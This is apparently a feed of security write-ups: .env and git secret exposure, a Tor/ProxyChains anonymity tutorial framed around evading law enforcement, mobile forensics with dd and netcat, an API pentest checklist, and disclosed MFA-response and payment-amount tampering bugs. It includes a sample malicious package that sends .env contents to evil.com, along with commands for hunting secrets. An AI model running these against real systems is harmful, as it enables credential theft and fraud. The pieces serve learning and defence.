entire history of the project.Tools for .git exploitation:# git-dumper - downloads entire .git repogit-dumper https://target.com/.git/ ./downloaded_repo/# GitTools - extract from exposed .gitgit clone https://github.com/internetwache/GitToolscd GitTools/Dumper./gitdumper.sh https://target.com/.git/ ./repo/cd GitTools/Extractor./extractor.sh ./repo/ ./extracted/# Search entire Git history for secretscd extractedgit log --all -p | grep -E '(password|secret|key|token|AKIA|sk_live)'git log --all --diff-filter=D --summary | grep delete # Find deleted filesBackup FilesDevelopers frequently create backup files during maintenance:# Common backup file extensions.bak, .old, .orig, .copy, .tmp, .swp, .swo, .save, ~ (tilde)# Fuzzing for backup filesffuf -u https://target.com/FUZZ \ -w backup_wordlist.txt# Example wordlist entriesconfig.php.bak.env.bakdatabase.php.oldwp-config.php~index.php.swp.env.saveConfiguration FilesBeyond .env, other config files often contain secrets:# Common config files to huntconfig.jsonconfig.phpconfig.jssettings.pyapplication.propertiesapplication.ymldatabase.ymlcredentials.jsonservice-account.jsonwp-config.phpPart V: The Supply Chain Angle — Malicious DependenciesMalicious packages actively hunt for .env files during installation. Since npm install (and pip install, gem install, etc.) can execute arbitrary code, a compromised dependency can:// Malicious package.js (hypothetical but based on real incidents)const fs = require('fs');const https = require('https');// Read .env fileconst envContent = fs.readFileSync('.env', 'utf8');// Exfiltrate to attacker serverhttps.get(`https://evil.com/exfil?data=${Buffer.from(envContent).toString('base64')}`);Real incidents:Shai-Hulud NPM worm — Designed to hunt and exfiltrate NPM and GitHub tokens at scale@ctrl/tinycolor compromise (2.2M weekly downloads) — Attackers weaponized TruffleHog itself as a payload to find and exfiltrate secretsnode-ipc supply chain attack — Malicious versions published to target specific developersCursor AI editor incident (2024) — .env file contents were being sent to servers for tab completion, even when files were listed in .cursorignorePart VI: Defense in Depth — How to Protect Against .env ExposureImmediate RemediationBlock hidden files at the server level# Apache Require all denied# Nginxlocation ~ /\.(?!well-known) { deny all; return 404;}// IIS 2. Remove .env from web-accessible directories -- Move it outside the document root.3. Implement CSP headers to restrict where scripts can load from.4. Disable source maps in production builds:// webpack.config.jsmodule.exports = { // ... devtool: process.env.NODE_ENV === 'production' ? false : 'source-map',};// vite.config.jsexport default defineConfig({ build: { sourcemap: process.env.NODE_ENV !== 'production', },});// next.config.jsmodule.exports = { productionBrowserSourceMaps: false,};PreventionUse a secrets manager — HashiCorp Vault, AWS Secrets Manager, Azure Key Vault, GCP Secret ManagerImplement .gitignore correctly and audit with git-secrets or trufflehogUse pre-commit hooks to scan for secrets:# .pre-commit-config.yamlrepos: - repo: https://github.com/awslabs/git-secrets rev: master hooks: - id: git-secrets4. Rotate secrets regularly — If a .env file might have been exposed, rotate every credential in it immediately.5. Scanner automation — Integrate secret scanning into CI/CD pipelines:# TruffleHog scan in CItrufflehog filesystem --directory=. --json | jq '.'6. Use ephemeral credentials — Short-lived tokens (IAM roles, OAuth2 token exchange) instead of long-lived API keys.DetectionMonitor for /.env requests in access logsUse automated scanners like shhgit, trufflehog, git-secretsDeploy canary tokens — Fake credentials placed in .env files that alert when usedPart VII: The 2026 Vibe Coding ProblemThe rise of AI-assisted development — “vibe coding” — has introduced a new dimension to the .env crisis. Research from 2026 shows that AI-generated code frequently makes mistakes that expose secrets:Hallucinated dependencies — AI tools generate package.json files with packages that do not exist in the registry, creating opportunities for typosquatting attacksHardcoded credentials — AI models trained on public code learn the pattern of hardcoding secrets and reproduce itSource maps left enabled — Default build configurations generated by AI often leave source maps enabled for productionMissing server blocks — AI-generated deployment configs rarely include rules to block hidden filesThe fix: Treat AI-generated code as untrusted input. Audit every file for secrets before deployment. Use automated scanners in CI/CD.ReferencesUnit 42 — Large-Scale Cloud Extortion Operation via Exposed .env FilesSecurity Affairs — 12 Million Exposed .env FilesSnyk 2025 State of Secrets — 28M Credentials Leaked on GitHubSentry Security Blog — Abusing Exposed SourcemapsMogwai Labs — Exploiting Laravel with Leaked APP_KEYsOWASP — Review Web Page Content for Information LeakageGitHub Dorking — techgaun/github-dorksInvicti — Dotenv .env File VulnerabilityVibe Eval 2026 — Frontend Secrets Leak ReportFollow MeGitHub: SecurityTalent | Medium: Security Talent | Twitter: Securi3yTalent | Facebook: Securi3ytalent | Telegram: Securi3yTalent#CyberSecurity #BugBounty #BugBountyHunter #EthicalHacking #InfoSec #WebSecurity #ApplicationSecurity #AppSec #CloudSecurity #FrontendSecurity #WebDevelopment #JavaScript #ReactJS #Laravel #NodeJS #DevSecOps #OWASP #SecretsManagement #GitHub #GitHubDorks #SourceMaps #EnvFiles #SecurityResearch #PenetrationTesting #RedTeam #BlueTeam #CloudComputing #AWS #Azure #GoogleCloud #VibeCoding #AI #SecureCoding #DeveloperSecurity #TechBlog #ProgrammingFrontend Security & Bug Hunting: The .env File Crisis and Real-World Exploitation was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

The Ultimate Guide to Stay Hidden Online: TOR and Proxy Chaining

Thu, 04 Jun 2026 10:16:06 +0200

The Tale of Three Brothers (Harry Potter and The Deathly Hallows)Hi, it’s me again. I’ve been superbly busy with college since this is my final year as a university student. I need to pass two more thesis presentations until it’s done, but I am kind of missing writing in Medium, so here I am before my page turns into spiderwebs. As a student, I met a lot of people here. The Math prodigy, computer freak, or that one friend who actively joins every organization they possibly can. For me, I’m definitely none of them. If I can portray myself, I am probably one of your friends who like to sit in the back of the class and read memes, totally invisible *LMAO.Well, are you a Potterhead? If you know the Tale of Three Brothers, you probably could guess that the younger brother is my favorite. The three brothers seek to cheat death and are granted magical objects. The first brother receives the Elder Wand, the second the Resurrection Stone, and the third the Cloak of Invisibility. The Elder Wand is said to be unbeatable in a duel, the Resurrection Stone can bring back the dead, and the Cloak of Invisibility makes the wearer invisible. However, the objects ultimately lead to the downfall of the brothers due to their greed and arrogance.In the internet world, having the elder wand and the resurrection stone is dope but the more important thing you need to consider is how to be hidden as if you wear the invisibility cloak. The Internet you saw is nothing but an iceberg, the more you go deeper, the darker it gets. By staying hidden, you reduce the risk of being tracked by law enforcement or hackers who might want to steal your personal information or use your device for illegal purposes. To reach that certain anonymity level, I’ll show you how to wear the cloak — I mean utilizing the TOR and proxy chains.The ConceptOkay let's begin with the concept, said you are a hacker, and you want to scan the FBI website (strictly not recommended *LOL). You got some information about the FBI systems by running several commands on your computer. The open ports, the operating systems used by the FBI, the service that runs on their system, literally everything. You could utilize that and exploit the vulnerability of the system even to penetrate in. Then a few hours later the police knocked on your door and said that you are under arrest. Well, how that could possibly happen?Well by the time you scan the FBI website and gain several information about them, they also learn a few things about you. The scan that you sent to them has a FROM address. Only by analyzing the logs, they’ll know immediately your IP address and then track you down in Canada. Simple as that. But don’t worry I’m not going to ruin the fun, below is the answer, yup ProxyChains. ProxyChains could help you to run applications through a proxy server, which can help to hide your IP address and encrypt your internet traffic. However, ProxyChains alone does not provide anonymity on the internet. To achieve anonymity, we need a combination of ProxyChains and Tor.Why do we need a lot of proxy servers? Well, personally I do not believe in things such as perfect anonymity, when you use only one proxy server, and your target knows that the IP address belongs to that proxy server, they can contact the provider asking for logs and boom you got caught. Using many proxy servers also did not guarantee that you wouldn’t get caught, but at least, that simple brainfuck game will make you a bit harder to find.The InstallationBefore I do the installation, I’ll make it clear that I myself do not promote any illegal activities by sharing this. I’m consciously writing this speaking on ethical hacking matters. Okay, the first thing you need to know is that ProxyChains comes preinstalled in Kali Linux, so now we just need to install the Tor service.sudo apt install torIf the TOR is successfully installed, we need to activate the service with the command below.sudo service tor startNow you need to locate where exactly the configuration file is needed to set up the ProxyChains on our computer. Just like in Harry Potter where you could use the accio spell, we’ll use the locate here. Hit the command below.locate proxychainsNow you know the configuration file, I need you to open that using the command below and we’ll see what we can do next.sudo nano /etc/proxychains4.confOkay, there are four options of ProxyList that we can utilize. There are Dynamic Chain, Strict Chain, Round Robin Chain and also Random Chain. The choice between strict, dynamic, random, or round-robin in ProxyChains depends on the specific needs and requirements of the user. Each method has its own advantages and disadvantages. Below you could see that strict_chain is coloured with white. That is because it comes to default. If you want to change the option, just uncommented the configuration using the “#” sign.Because we can only choose one and I want to use the round-robin chain, I put the “#” sign in strict_chain and delete the “#” sign in round_robin_chain to activate it.Well, for the last touch put the “socks5 127.0.0.1 9050” entry at the end of the file to specify the local SOCKS proxy server and port that ProxyChains will use to forward the traffic. Port 9050 is the default port that the Tor client software listens on for incoming SOCKS5 connections. Why do we need the SOCKS5 when we already got the SOCKS4? SOCKS5 is generally considered to be more secure than SOCKS4, as it supports authentication and can encrypt the traffic between the client and the proxy server. If you are done, just save the configuration file by pressing the CTRL button and X at the same time.The moment of truth, now you can use the ProxyChains to hide yourself. Here I try to access the browser — Firefox and do the DNS leak test.Below is the IP address that I got, and I suppose my location. Currently, I’m not in Vienna and ProxyChains will keep changing my IP Address and also the location for the next few times. You can add your own configuration by adding a free IP that you obtain from free Proxy Servers available online. You can make them guess where actually your location is, imagine someone searching for you on the other side of the world and finding nothing. It can be quite frustrating, mate:”))ConclusionGood luck finding me in Vienna — cheerio 🤙The Ultimate Guide to Stay Hidden Online: TOR and Proxy Chaining was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

“Bug Bounty Bootcamp #42: JWT Attacks — How a Stolen Token or a Weak Secret Can Grant You Admin…

Thu, 04 Jun 2026 10:16:17 +0200

JSON Web Tokens are everywhere — in cookies, Authorization headers, and API calls.Continue reading on InfoSec Write-ups »

I Finished My Thesis Defense — A Journey to Mobile Forensic

Thu, 04 Jun 2026 10:16:28 +0200

I Finished My Thesis Defense — A Journey to Mobile ForensicThomas Shelby and May CarletonIf there is an award for making things complicated, I’d probably be the winner. The ultimate rule to graduate from uni is to do research that most likely you’ll be compatible with. Sure, I knew the theory, but I don't know why — and in every aspect, I always ended up doing the complete opposite *duh.Instead of doing research in the field of mobile forensics and choosing to do what I thought I was capable of doing, I improvised — a lot. I try to implement a model and it’s a kind of mixture of semantic web and mobile forensics. You know, I spent my holiday crying because I felt so dumb that I was incapable of understanding the idea that I wanted to bring. Guess what? Through hardship, patience, determination, and revelation from God who sent me a humble yet very chill supervisor who always encouraged me to finish my work, I finally did it.You know what, sometimes it’s not the situation that going to kill you, but panic will. I was worried that I couldn’t do my thesis, but after I did it, I was more worried that my work was too simple to be presented for my thesis defense (it’s not that simple af girl you are joking writing this). Guess I just spent my time overthinking things and got panicked when everything is actually negotiable and under control hahaha my bad. I’ll talk about my thesis later, now I want to show you how to do basic mobile forensics most people do in digital forensics investigation. I think you’re going to like it even though I thought it boring by now.PrerequisitesLet me inform you that we need some equipment and tools to do this process.Mobile PhoneGet yourself a phone, it’s up to you whether you want to use an iPhone, smartphone, or that indestructible N*kia 3310 *LOL. I bought an Android specifically for my thesis but since there are some problems on my campus, by the time I wrote this article, our phones were still seized by authorities. I know shit happens and c’est la vie but never mind, I’ll use a virtual phone emulated by GenyMotion App for this tutorial, so I’m sorry if you cannot relate.2. Platform ToolsOkay, now you need to download the tool at this address, I’ll inform you later what the function is. Download based on the operating system that you used, Mac, Linux or maybe Windows? https://developer.android.com/tools/releases/platform-tools3. AutopsySame with the Platform Tools, choose what suits best with your operating system, and I’ll tell you about the function later. Here https://www.autopsy.com/download/4. BusyboxI need to inform you that I’m going to use the Physical Acquisition method for the acquisition process, so it requires us to root the phone (don’t do this if you don’t want to lose your phone’s warranty and make it vulnerable to security issues). Well, for the rooting process, we’ll definitely need Busybox. Mine uses Busybox Pro, but you can download the tool via PlayStore.5. Ncat and USB cableCause we’re going to do the mobile forensic process on our laptop, or should we call it a forensic workstation, we still need to connect them to our phone. For this case, a USB cable is particularly not needed to connect the phone to our laptop since I use a virtual phone, but the Ncat tool is a must since it helps us to build a connection between the two devices. Here downloads the tool at this address https://nmap.org/ncat/The StepsMobile device forensics is the science of recovering digital evidence from a mobile device under forensically sound conditions using accepted methods. Digital forensics investigation is kind of a tricky process to do because any mistake we make during the process could make the digital evidence presented to the court invalid. So doing this process requires discipline. The standard usually used for mobile forensics is NIST SP 800–101 Revision 1. That standard divided the forensics process into four phases, they are preservation, acquisition, examination and analysis, and the last reporting of digital evidence.PreservationNIST SP-800–101 Rev 1 stated that evidence preservation is the process of securely maintaining custody of property without altering or changing the contents of data that reside on devices and removable media. Preservation involves searching, recognizing, documenting, and collecting electronic-based evidence. When we use the actual mobile phone, the process consists of documenting the condition of the devices, like taking a photo of the evidence, front, behind, and also the battery capacity.Also, the steps that need to be done are enabling airplane mode and then turning off the cellular data and Wi-Fi. We need to do that to make sure that there is no signal exchange in our device that may modify the current state of the data stored on the mobile device. Most of the time Faraday bag is used in isolation to shield the evidence from external signals. Also, we need to disable the GPS to maintain the integrity of location-related evidence. If GPS is active, it may continue to collect and update location information, potentially altering the data relevant to the time of the incident under investigation. By turning it off, you freeze the GPS data at a specific point in time.AcquisitionAfter doing the preservation step, be ready for the acquisition process. Acquisition is needed since you cannot directly be involved with the evidence, this method helps to maintain a digital chain of custody, which is essential for ensuring that the evidence is admissible in court. It demonstrates that the evidence hasn’t been tampered with or altered during the investigation process. So, in short, you need to duplicate, copy or image the evidence in this step.As I mentioned before, I’ll do the physical acquisition. Physical acquisition itself refers to the process of directly accessing and copying data from a mobile device's physical storage, this method involves creating a bit-by-bit copy or image of the device’s storage, including both user data and system files, at a low-level, binary level, etc.Previously I asked you to download Busybox, now time to install it on your phone. Busybox has utilities called ‘dd’ (used for low-level copying of data) that will help us in creating disk images for forensic analysis.Below, on the left side, you see that I haven’t installed Busybox on the phone. I just keep the setting into default then click the Install button and let the app do its work. Now move to your phone or in my case the virtual phone. Before you can do the physical acquisition, you need to do some settings on your phone to make sure that the device is granted access to debugging interfaces. Find the “About phone” part on your phone then search for the Build number, click that around 7–8 times until it states that the developer mode has been enabled.,Great, if the developer options have been activated you can go to Settings and click that part. Look at the right picture, in the Developer options go find Debugging options then mark the USB debugging part to allow USB debugging.We’ve done it here, it’s not a rooting process, it’s just a basic setting to help the device connect with the forensic workstation. You can do physical acquisition without rooting the phone if the phone that you used is a virtual phone, like mine. When it comes to actual phones, believe me, mate the process is kind of complicated. I failed like 5 times only to do the rooting things, tired but this gal has goals.Now it’s the game changer, remember I asked you to download the platform tools, eh? Now open it via Command Prompt and run the adb.exe using this command below.adb.exe devicesBelow on the right side is the virtual phone opened by the Genymotion app. The command above is used to check whether the device is connected to the forensic workstation or not. You see on the left side below that the IP address I got from my virtual phone already appears, meaning the device is already connected to my laptop.The platform tools I mentioned before contain the adb.exe that we previously ran to our terminal, but also the Genymotion app. It provides the adb.exe to let the virtual phone communicate with the laptop.Now we’ll start to do imaging. First, allow the superuser access to the phone so that we can be root. Then open the adb.exe shell in Genymotion via the command prompt. Search the file “tools” first in Genymotion, you can track that through the path on my computer. Mine is C:\Program Files\Genymobile\Genymotion\tools . When you finish, you can run the command below to display the partition information of the phone. The part in the red square is the internal storage that we’re going to image, it’s around 5 GB.cat /proc/partitionsNow open both terminals, the adb shell from platform tools and also from the Genymotions, but before that make sure you already installed the Ncat tools on the laptop. Okay, keep in mind that to make it easy for you, from now on I’ll place the adb shell from the Platform Tools on the left side and the adb shell from Genymotions is on the right side.Before we can do the imaging or extract data from a mobile phone to our forensic workstation, we have to make the two devices listen to each other, just like what they’ve said mate — communication is key. Port forwarding can facilitate this communication and make the extraction possible, so please hit the command below.adb forward tcp:8888 tcp:8888When the connection is successful, it will reply back with “8888” which is the number of ports that we choose to route traffic. Now move to the right side, the command dd will help us to read data from the /dev/block/sdb device file (from the phone) and then send that data over the network to another device listening on port 8888 (the laptop) using ncor Ncat.dd if=/dev/block/sdb | busybox nc -l -p 8888Back to the left side, hit the command below to capture data from the network connection and save the output to a file for further analysis or processing. The output literally will be an imaging file with the .dd format and for this file, I give it a name callitatest.dd.ncat.exe 127.0.0.1 8888 > youcannameitasyoudesired.ddThe output will be saved in the same directory where you place the platform-tools. Wait patiently as you watch the sign mark in the red square keep blinking. The imaging process will take time depending on the storage capacity of your phone, it gradually increases from KB to GB as you see in the right picture.Well, well, well, see the left picture the process is done and as you can see the .dd file size is definitely around 5 GB just like I mentioned the virtual phone storage capacity from the beginning. Also, when the process is done, you’ll see the notification in the Genymobile’s CMD just like in the right picture.Examination and AnalysisThe examination process uncovers digital evidence, including that which may be hidden or obscured. The results are gained through applying established scientifically based methods and should describe the content and state of the data fully, including the source and the potential significance. Data reduction, separating relevant from irrelevant information, occurs once the data is exposed.The analysis process differs from the examination in that it looks at the results of the examination for its direct significance and probative value to the case. Examination is a technical process that is the province of a forensic specialist. However, analysis may be done by roles other than a specialist, such as the investigator or the forensic examiner.We’ll use Autopsy to do the examination and analysis. Yeah, all your sins will be revealed here. First, open the Autopsy and make a New Case.Give the case a name, like mine is Case1. After you finish just click the Next part.Just keep clicking Next until you find this part. In this part, you need to browse the .dd file that we acquired in the acquisition phase before. After done, just keep clicking Next.We need to configure the Ingest module here, please click Select All. The Ingest module is used to bring data from various sources into the Autopsy case management system. It helps with data acquisition, verification, and indexing, and allows for easy management and analysis of digital evidence within a case. It’s a critical component for forensic investigations, ensuring data integrity and efficiency in the analysis process.Keep clicking Next until the display looks like the picture below. Before you can do the examination and analysis, you’ll need to wait for the configuration until 100%.When it’s already 100%, you can start doing the examination and analysis now. The process involves examining specific artefacts such as chat messages, call logs, GPS data, and other information relevant to your investigation. Also export any relevant data, and findings, or validate the analysis results by confirming that the findings are consistent with your expectations and that your analysis was conducted accurately.ReportingReporting involves creating a comprehensive overview of the investigation process, including the actions taken and findings. Effective reporting relies on thorough documentation of activities, observations, test results, and data interpretations. A well-crafted report is built upon robust records, notes, images, and data generated by tools. I’m not going to put the reports here because it will be too long, so don’t mind checking the NIST SP 800–101 Revision 1 document for the format and standard.ConclusionWhoever is struggling with the thesis, I feel you. With love…Reference[1] Ayers, R., Brothers, S., & Jansen, W. Guidelines on Mobile Device Forensics. Retrieved October 25, 2023, from https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-101r1.pdfI Finished My Thesis Defense — A Journey to Mobile Forensic was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

API Penetration Testing Checklist: How Real-World Attacks Break APIs Before Scanners Do

Thu, 04 Jun 2026 10:16:42 +0200

How Real-World Attacks Break APIs Before Scanners DoAPIs are the backbone of modern applications: powering mobile banking, e-commerce, healthcare systems, AI integrations, and microservices.Today, APIs handle over 90% of global web traffic, yet they remain one of the most exploited attack surfaces in modern security incidents.High-profile breaches like T-Mobile (37M records exposed) and Optus (9.8M records leaked) were not caused by advanced exploits: but by simple broken authorization and exposed API logic.And in both cases, automated scanners failed.Because API security failures are rarely technical bugs.They are logic flaws in how systems define trust, identity, and access.Why APIs Break in Real WorldAPIs fail because:Business logic is exposed directly through endpointsAuthorization is weaker than authenticationAPIs evolve faster than security testingAttackers test workflows, not just inputsScanners detect vulnerabilities. Attackers exploit behavior.Black Box vs Grey Box TestingBlack BoxNo internal access-only:Base URL or applicationSwagger (sometimes)Mobile app (sometimes)Focus:Endpoint discovery (fuzzing)Traffic interception (Burp/ZAP)Shadow API detectionCommon findings:/admin/internal/debug/v2, /betaGrey BoxPartial access:Postman collectionsAPI documentationArchitecture insightsEnables deeper testing of:Authorization logicToken flowsBusiness workflowsAPI Recon (Attack Surface Mapping)1. Endpoint FuzzingTest:/api/v1/users/api/v2/users/internal/users2. HTTP Method TestingCheck:GET, POST, PUT, DELETE, PATCH, OPTIONS3. Shadow APIsHidden or forgotten APIs in:legacy systemsmobile backendsinternal services exposed externally4. Version EnumerationTest:/v1//v2//beta/Older versions often lack proper security controls.Authentication & Identity TestingCommon FailuresWeak login protection (no lockout / CAPTCHA)User enumeration via error messagesExpired tokens still validAPI keys exposed or reusedSensitive data in URLsExample:GET /reset?token=abc123JWT Security TestingKey Checksalg: none bypassWeak HS256 secrets (brute force)Missing token expiration validationSensitive data in JWT payloadJWT is base64 encoded, not encrypted.Authorization Testing (Critical Layer)1. BOLA / IDORChange object references:/user/123 → /user/456If accessible → data exposure.2. BFLA (Function-Level Access)Test admin actions as normal user:deleteupdateprivileged endpoints3. Privilege EscalationCheck for:role manipulation in request bodymass assignment flawshidden admin parametersExample:{"role": "admin"}Input Validation & InjectionTest for:SQL / NoSQL injectioncommand injectionmalformed JSON payloadsunexpected data typesAPIs often trust frontend validation -which is unsafe.Business Logic Vulnerabilities (High Impact)1. Pricing Manipulationnegative valuesdiscount abuseprice tampering2. Workflow Abuseskipping payment stepsreplaying requestsout-of-order operations3. Inventory Manipulationrace conditionscart abusestock exhaustion4. Account Abuserole escalation via hidden fieldsmass assignment issuesRate Limiting & AbuseTest for:brute force attacksOTP guessingAPI scrapingunlimited requestsBypass TechniquesIP rotationheader spoofing (X-Forwarded-For)parallel requestsData Exposure IssuesCheck for:PII leaks (email, phone, address)internal IDs exposedpassword hashes in responsesexcessive response dataIf response is “too detailed”, it’s a risk.Configuration & MisconfigurationsCommon issues:exposed /debug, /internalCORS set to *missing security headersoutdated API versionssecrets in logs or configsModern API Attack SurfaceGraphQLintrospection enabledquery depth abusebatch requests for brute forceCloud APIspublic S3 / blob storagemisconfigured IAM permissionsexposed storage endpointsFile Upload APIsunrestricted file typesexecutable uploadsbypass validationSSRF in APIsuser-controlled URLsinternal network access via API callsAutomation vs Manual TestingAutomate:baseline security checksauthentication testingregression scansCI/CD integrationKeep Manual for:business logic flawsauthorization bypasscomplex workflowsBest approach = hybrid security testingFinal API Security Checklist (Summary)Every API must be tested for:Authentication & Authorization (BOLA, BFLA)Input validation & injectionBusiness logic abuseRate limitingData exposureConfiguration issuesCloud & GraphQL securityFinal ThoughtAPI security is not about endpoints.It is about how trust is defined: and how it is broken. Most vulnerabilities are not coding errors. They are unvalidated assumptions in business logic. And attackers don’t break APIs. They simply use them in ways nobody tested.This concludes my API security series. Next, I’ll be exploring Active Directory penetration testing.API Penetration Testing Checklist: How Real-World Attacks Break APIs Before Scanners Do was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Setting Up n8n Locally on Kali Linux Using Docker

Thu, 04 Jun 2026 10:16:58 +0200

Continue reading on InfoSec Write-ups »

I Typed 000000 and the App Thought MFA Was Already On

Thu, 04 Jun 2026 10:17:08 +0200

I never scanned the QR code. One intercepted response was enough.Six digits. All zeros.I type them into the MFA setup field and click Continue.I haven’t opened an authenticator app. I haven’t scanned anything. The QR code the app just generated is sitting ignored in a background tab. The OTP I submitted is as fake as it gets — six zeros, the first thing you try when you want to see what breaks.The server responds with a 400 Bad Request. Of course it does. The OTP doesn't match any secret, because no secret was ever registered anywhere. The server is doing its job correctly.I’m about to move on when I notice Burp Suite has “Intercept Response” switched on.The error response is sitting in my proxy. It has already left the server. It hasn’t reached my browser yet. For the next few seconds, it belongs to me.The idea is simple. The server made a decision. The browser hasn’t heard it yet. What if I change what the browser hears?I delete the 400 error body. Replace it with this:{ "errorCode": "MFA_AUTHENTICATOR_ALREADY_ACTIVE", "detail": "TOTP authenticator is already enabled for this account. No further action required."}Forward.The modified response travels the last few milliseconds to the browser. The frontend parses the JSON. The UI updates.App Authentication: PRIMARY ✓The same green checkmark. The same status label. The same settings screen any real user would see after successfully completing MFA setup.The QR code is still open in that background tab. Unscanned. Untouched.I check what actually happened on the backend.The TOTP secret was generated when the app created the QR code — that part is real. But no authenticator app ever registered it. The shared secret exists on the server and nowhere else. No phone binding. No app binding. Nothing.The frontend says MFA is on. The backend has no completed setup on record. These two things are now in different states, and the application has no mechanism to detect the gap.The root cause is not hard to articulate. The frontend never checked. It waited for the API to tell it what happened, took that response at face value, and updated the UI accordingly. There is no server-side confirmation happening on the client side. No cryptographic verification that a real TOTP binding exists. The frontend asked the API “are we done?” and I answered for the API.This vulnerability class goes by a few names — improper client-side validation, response manipulation, frontend trust failure — but the underlying error is always the same: UI logic that treats the API response as ground truth without validating it against actual server state. The frontend is doing the server’s job of deciding whether a security-critical operation succeeded.The fix is not complicated. The backend should require a confirmed TOTP token exchange before returning any success state — not an error message that says “already active,” but an actual verified response. The client’s only job is to render confirmed server state, not to interpret error codes and decide setup is complete. Any response without a verified TOTP binding should drop the user back to step one, regardless of what the errorCode field claims.One server-side check. That is the entire fix.What stays with me about this finding is not the bypass itself.Most MFA bypass vulnerabilities mean one thing: an attacker gets into an account they shouldn’t be in. This one does something different. This one leaves the account owner walking away believing they are protected.Think about who this actually affects. Not the attacker — the attacker knows exactly what happened. The real target is the user. Someone who followed the setup flow, clicked Continue, saw the green checkmark, and closed the settings page with the reasonable assumption that they just hardened their account. They did everything right. The app confirmed it. There is no obvious reason to check again.That account has zero second factor. Both the user and the application believe it has one.The gap between what is real and what is displayed is more dangerous than a straightforward login bypass. A bypass gets detected. A security illusion just sits there, undisturbed, in an account settings screen nobody looks at twice.The industry has a name for this kind of design failure: security theater. A feature that signals protection without providing it. The checkbox is checked. The lock icon is green. The risk is unchanged.What makes the response manipulation angle interesting is that the theater is not intentional — it is an accident of architecture. The developers almost certainly did not design the UI to lie. They just wrote code that trusted the API response, and did not think through what happens when that trust is abused. It is a boundary problem, and it hides in codebases because it does not look like a bug. It looks like code that works.I wrote the report the same night. The acknowledgment came back with the usual language — we will review this with our security team — and I logged it and waited.Writing about it now, I keep coming back to one question I cannot fully answer: how many applications have UI that trusts API responses the same way across security-critical flows? Not in the abstract. Specifically in auth flows. Permissions. Access control. The places where “the frontend checked and said yes” is not good enough.The green checkmark on an MFA setup screen is supposed to mean something verified happened. Usually it does. But if the only thing standing between a completed setup and a spoofed one is which JSON response reaches the browser — the checkmark is an assumption, not a proof.That distinction matters more than most codebases treat it.Would your first instinct have been to intercept the response — or to look for a flaw in the request itself?Drop it in the comments. I’m curious whether this attack surface shows up in your methodology or if it’s one most people skip past.I Typed 000000 and the App Thought MFA Was Already On was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

I Bought a ₹1,599 Government Book for ₹1. The Server Approved It.

Thu, 04 Jun 2026 10:17:26 +0200

The payment page showed ₹1.00. I had not touched the price field. I had only touched one number in one request.I was not looking for a vulnerability that day.I was clicking around a government website — an official portal where students could buy books published by government bodies. Study material, reference texts, the kind of dense, official content you’d find in competitive exam prep stacks. The kind of website that nobody thinks to test because it’s government, it’s boring, and what’s the worst that could happen with a bookstore?I had Burp Suite running in the background. Force of habit.I picked a book. Added it to the cart. Clicked checkout. Filled in fake billing details — Lord, Hello World, 9999999999, a pincode that doesn’t exist, an email with a typo in the domain. The kind of information you enter when you’re testing a flow and have no intention of completing the purchase.Then I clicked Pay Now.Burp caught the POST request before it hit the server.The endpoint was /ccavRequestHandler. The request body had sixteen parameters: order_id, billing_name, billing_tel, billing_email, billing_address, billing_city, billing_state, billing_zip, billing_country, merchant_id, language, currency, redirect_url, success_url, cancel_url — and one more.amount=1599I stared at that for a moment. Then I changed it to 1.Not ₹100. Not ₹10. ₹1. I wanted to see how far this would go.I forwarded the request.The payment page loaded.In the top-left corner, in blue text:INR 1.00 (Total Amount Payable)The payment gateway had received a transaction request for ₹1. It had no reason to question this. As far as the gateway was concerned, a legitimate merchant server had just told it: this order costs one rupee. Process it.The “Make Payment” button was right there. Accepting American Express, Mastercard, RuPay, Visa.I turned off the intercept and refreshed the page. ₹1.00 was still showing. This was not a rendering artifact. The transaction session had been created at ₹1. The gateway was waiting for me to pay one rupee for a ₹1,599 book.I did not proceed with the payment. I had enough.Here is the architecture failure underneath this:The government portal was treating the amount field in the checkout POST request as a trusted user-supplied value. The merchant ID, the order ID, the item itself — all server-side. But the price? Client-side. Passed through the browser. Interceptable. Modifiable. No validation on the server before it was handed to the payment gateway.This is a business logic vulnerability — not an injection, not a bypass, not a CVE with a complicated name. No payload. No encoding. I opened Burp Suite, found a number, and changed it. That was the entire attack.The assumption the developers had made — one that gets made constantly on Indian e-commerce platforms — was that a normal user would never look at the raw HTTP request. And they are right about normal users. Normal users do not run Burp Suite. But an attacker does.Think about what this looks like at scale.This was a government portal that sold books to students — students preparing for government exams, students buying prescribed reference material, students on tight budgets who were likely the exact demographic this portal existed to serve.Every book in that catalog. Any user with a proxy tool. Any price they chose.The gateway had no way to cross-reference the amount it received against the actual product price on the backend. There was no order validation webhook, no server-to-server price confirmation, no check that said: “Wait — this order was created for ₹1,599. Why are you asking us to collect ₹1?”In a commercial platform, that’s a revenue leak. In a government portal distributing official study material, that’s a publicly funded resource being made freely exploitable. Not hypothetically. Actually, directly, by anyone willing to spend five minutes with an intercept proxy.I reported it.The address was rvdp@nciipc.gov.in — the Responsible Vulnerability Disclosure Program run by India's National Critical Information Infrastructure Protection Centre. I wrote up what I'd found: the endpoint, the vulnerable parameter, the steps to reproduce, the screenshot of the ₹1 payment page. I sent it off.I wasn’t sure what to expect. Government VDPs in India have a reputation for silence. Not because no one cares — but because the pipeline from researcher inbox to development team is long, and the process isn’t always visible from the outside.A reply came.They acknowledged the finding. The vulnerability was taken seriously. The fix was deployed.That was it. No bounty — this was a responsible disclosure program, not a bug bounty program. No CVE. No hall of fame that I was aware of. But the issue was fixed, and the portal was no longer accepting arbitrary amounts from the client side.That’s the complete story. And I keep the screenshots.I’m writing this in 2026. The original finding was in 2024.This was one of the first vulnerabilities I ever found on a real system. The reason I’m writing it now is not to demonstrate technical sophistication — the technique is not sophisticated. It’s to demonstrate what is possible when you simply look at what is being sent.Most beginners spend months learning injection techniques, bypass methods, escalation chains. They overlook the simplest question: is the server trusting something it shouldn’t? A price. An account balance. A discount code. A session duration. Any value that the application treats as authoritative but originates from the client is a candidate for this exact test.I found this because I had Burp running as a habit. Not because I had a methodology document open. Not because I had targeted this site specifically.If you’ve been testing web applications for more than a few months, you have almost certainly seen a parameter that controls value — price, quantity, role, discount percentage, account tier — passed through the browser. Did you test it?And if you find something like this in 2026: India’s national bug disclosure is at 